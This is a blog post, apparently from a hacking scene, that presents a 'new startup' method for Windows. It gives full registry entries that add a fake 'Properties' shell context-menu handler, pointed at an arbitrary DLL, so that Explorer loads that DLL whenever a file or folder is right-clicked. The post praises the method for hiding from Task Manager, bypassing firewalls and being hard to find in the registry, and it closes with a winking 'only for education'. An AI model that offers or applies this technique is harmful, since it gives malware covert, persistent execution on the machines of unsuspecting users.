Thursday, April 24, 2014
New Startup

Arrow Image Not for beginners...



Hello folks...
I want to demonstrate a "new" "startup" method.
Maybe new is the wrong word, but anyway, I have never seen this method described elsewhere.
Yeah, I googled too, but this one differs from the others.
Try to google it, you won't find it!

At the end I'll show you the advantages :)
And after reading you will see why I quote "new" & "startup".

Ok, here we go:

Our target is the context menu that drops down
when you right-click a file or directory.
Let's take a look at mine (file context menu):

We run regedit and go to
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\

Here are the entries:
[CODE]
[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Offline Files]
@="{750fdf0e-2a26-11d1-a3ea-080036587f03}"

[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Open With]
@="{09799AFB-AD67-11d1-ABCD-00C04FC30936}"

[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Open With EncryptionMenu]
@="{A470F8CF-A1E8-4f65-8335-227475AA5C46}"

[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Shell Extension for Malware scanning]
@="{45AC2688-0253-4ED8-97DE-B5370FA7D48A}"

[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\WinRAR]
@="{B41DB860-8EE4-11D2-9906-E49FADC173CA}"

[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}]
@="Start Menu Pin"
[/CODE]

The directory context menu handlers are similar. View yours here:
HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\

Now let us look at what
...
@="{B41DB860-8EE4-11D2-9906-E49FADC173CA}"
...
means!

We go to
HKEY_CLASSES_ROOT\CLSID\ and search for that CLSID.

Yo, found this:
[CODE]
[HKEY_CLASSES_ROOT\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}]
@="WinRAR"

[HKEY_CLASSES_ROOT\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\InProcServer32]
@="C:\\Programme\\WinRAR\\rarext.dll"
"ThreadingModel"="Apartment"
[/CODE]
Hmmm, my first idea was to change the DLL path, so Explorer.exe would load it
when we right-click (RC) on a file or dir!

Wow, it works. But what's that... Explorer hangs! Hmm!
BTW, the DLL is loaded only once, the first time you RC on a file or dir.
After that you can't make changes. To make changes you have to kill explorer.exe
and then do your changes. Creating a new task "explorer.exe" will give you the next try.

But how do we know whether the user has WinRAR or a similar tool installed whose entry we could take over??
Nahh... don't think of it! We do it better!
First we create a usual-looking Windows entry like Properties (file & dir context) and
assign the following CLSID to the default value:
[CODE]
[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Properties]
@="{A41D8860-8EE4-11C2-9906-E49FADC173CB}"

[HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\Properties]
@="{A41D8860-8EE4-11C2-9906-E49FADC173CB}"

-----------------------------------
And finally the CLSID entry itself:
-----------------------------------
[HKEY_CLASSES_ROOT\CLSID\{A41D8860-8EE4-11C2-9906-E49FADC173CB}\InProcServer32]
@="C:\\some.dll"
"ThreadingModel"="Apartment"
[/CODE]

But it's not the end! Now it's your turn to code a working DLL.
Just code your DLL like a normal application. That's enough for the start!
Careful! Don't code your app/DLL as a blocking loop,
like:
[CODE]
a := true;
while a do begin
  ...
  if user = 'crazy' then begin
    a := false;
  end;
  ...
end;
[/CODE]

Your app/DLL must be able to process messages, i.e. it must return control to Explorer instead of blocking its thread. Otherwise Explorer will hang!
Now be creative!

=Advantages=
- not shown in Task Manager (it runs inside explorer.exe)
- firewall bypass (only when the user is careless enough to let Explorer connect to the internet)
- hard to locate in the registry (without extra tools ;)

=Disadvantages=
- starts only when the user right-clicks

Whew... my fingers...
I hope I brought you some useful information!
If someone has improvements, message me.
Did I make some grammar mistakes? Excuse me.
Correct me if you found something wrong or something isn't clear enough!


And remember, only for education... ;)
KNOWLEDGE is POWER and that is what we want!
